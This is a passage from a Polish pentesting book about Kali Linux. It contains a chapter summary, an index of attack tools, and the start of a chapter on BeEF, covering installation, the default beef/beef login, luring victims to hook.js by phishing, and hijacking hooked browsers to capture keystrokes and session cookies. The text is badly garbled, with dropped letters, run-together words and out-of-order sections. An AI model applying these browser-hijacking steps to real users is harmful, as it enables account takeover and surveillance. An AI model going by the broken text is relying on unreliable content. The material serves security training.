PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
6
Ataki na aplikacjeinternetowe
i serwery WWW
W tym rozdziale skoncentrujemy si na atakach przeprowadzanych z wykorzystaniem inter-netu Administratorzy odpowiedzialni za bezpiecze stwo rodowiska komputerowego firmyczy organizacji doskonale zdaj sobie spraw z tego e w internecie nie brakuje czarnych charak-teroacutew ktoacutere nieustannie szukaj nowych sposoboacutew prze amywania zabezpiecze W odpowiedzina takie zagro enia administratorzy staraj si implementowa coraz bardziej skomplikowanesystemy zabezpiecze Do najcz ciej spotykanych mechanizmoacutew obronnych nale zaporysieciowe systemy wykrywania w ama i zapobiegania im (IPSIDS mdash ang Intrusion PreventionSystemIntrusion Detection System) czy systemy instalowane bezpo rednio na hostach takiejak programy antywirusowe lub monitoruj ce wykorzystanie zasoboacutew W przesz o ci takie rozwi -zania by y w zupe no ci wystarczaj ce aczkolwiek spotykane obecnie z o liwe programy i innezagro enia ktoacutere czyhaj w sieci staj si coraz bardziej wyrafinowane i cz sto umo liwiajatwe obej cie mechanizmoacutew zabezpieczaj cych oferowanych przez standardowe komercyj-
ne produkty bdquoz poacute kirdquo (COTS mdash ang Commercial Off The Shelf) Narz dzia ktoacutere b dziemyomawiali w tym rozdziale pozwalaj pentesterowi na zdalne omijanie standardowych zabez-piecze atakowanych systemoacutew
Przedstawiane tu zagadnienia i oprogramowanie stanowi dope nienie arsena u technik i na-rz dzi ka dego pentestera aplikacji internetowych Z lektury poprzednich rozdzia oacutew dowie-dzia e si w jaki sposoacuteb przeprowadza rozpoznanie i gromadzi informacje o rodowiskub d cym celem testu penetracyjnego jak wyszukiwa podatno ci i luki w zabezpieczeniachzaroacutewno po stronie serweroacutew jak i klientoacutew aplikacji internetowych oraz pozna e sposobywykorzystywania znalezionych luk do uzyskania nieautoryzowanego dost pu do atakowanego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
232
systemu Teraz zajmiemy si technikami b d cymi niejako uwie czeniem ca ego procesu ata-kowania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Dodatko-wo poka emy w jaki sposoacuteb do ataku u y hellip serwera b d cego celem ataku oraz jak z amazabezpieczenia aplikacji internetowych w ramach atakoacutew na przegl darki atakoacutew z wykorzy-staniem serweroacutew proxy oraz przechwytywania hase dost pu Omoacutewimy roacutewnie wybranemetody zak oacutecania pracy us ug internetowych za pomoc atakoacutew typu DoS
BeEF mdash Browser Exploitation Framework
Podatno ci i luki w zabezpieczeniach przegl darek mog by wykorzystywane przez z o liweoprogramowanie do zmiany zachowania przegl darki w okre lonych sytuacjach Podatno ciprzegl darek internetowych to bardzo popularny wektor ataku poniewa zdecydowana wi k-szo systemoacutew operacyjnych pod ktoacuterych kontrol dzia aj klienty aplikacji internetowychwyposa ona jest w tak czy inn przegl dark Przyjrzyjmy si zatem jednemu z najpopular-niejszych narz dzi przeznaczonych do wykorzystywania luk w zabezpieczeniach przegl darekinternetowych
Istnieje wiele interesuj cych narz dzi wspomagaj cych przeprowadzanie testoacutew penetracyjnychNarz dzia te powinny si znale w Twoim bdquohakerskimrdquo arsenale Jednym z nich z pewno ci jestprogram BeEF (ang Browser Exploitation Framework) BeEF to pakiet zbudowany w oparciuo przegl dark ktoacutery bdquopodpina si rdquo do jednej przegl darki lub nawet kilku przegl darek w syste-mie klienta i tworzy przyczoacute ek ktoacutery mo na wykorzysta jako baz do dalszych atakoacutew U yt-kownik mo e zosta bdquozaatakowanyrdquo kiedy odwiedza specjalnie przygotowan stron internetow po czym kontynuuje przegl danie innych witryn nie zdaj c sobie zupe nie sprawy z tego enapastnik ma ju pe ny dost p do jego sesji BeEF potrafi omin zaroacutewno sieciowe urz dze-nia zabezpieczaj ce jak i mechanizmy ochronne instalowane bezpo rednio na hostach takiejak systemy antywirusowe Staje si to mo liwe dzi ki wykorzystywaniu luk w zabezpieczeniachpowszechnie spotykanych przegl darek takich jak Internet Explorer czy Firefox
Pakiet BeEF nie jest do czany do wersji 10 systemu Kali Linux ale mo esz pobra go zestrony httpbeefprojectcom Mamy jednak nadziej e ze wzgl du na swoj du popularnow rodowisku pentesteroacutew i nie tylko BeEF znajdzie si w kolejnych wydaniach systemu KaliLinux
Aby zainstalowa pakiet BeEF powiniene otworzy okno terminala i z poziomu u ytkownikaroot wykona nast puj ce polecenia
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
233
apt-get updateapt-get install beef-xss
Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF
Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku
Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew
Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
234
W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef
Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
235
Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji
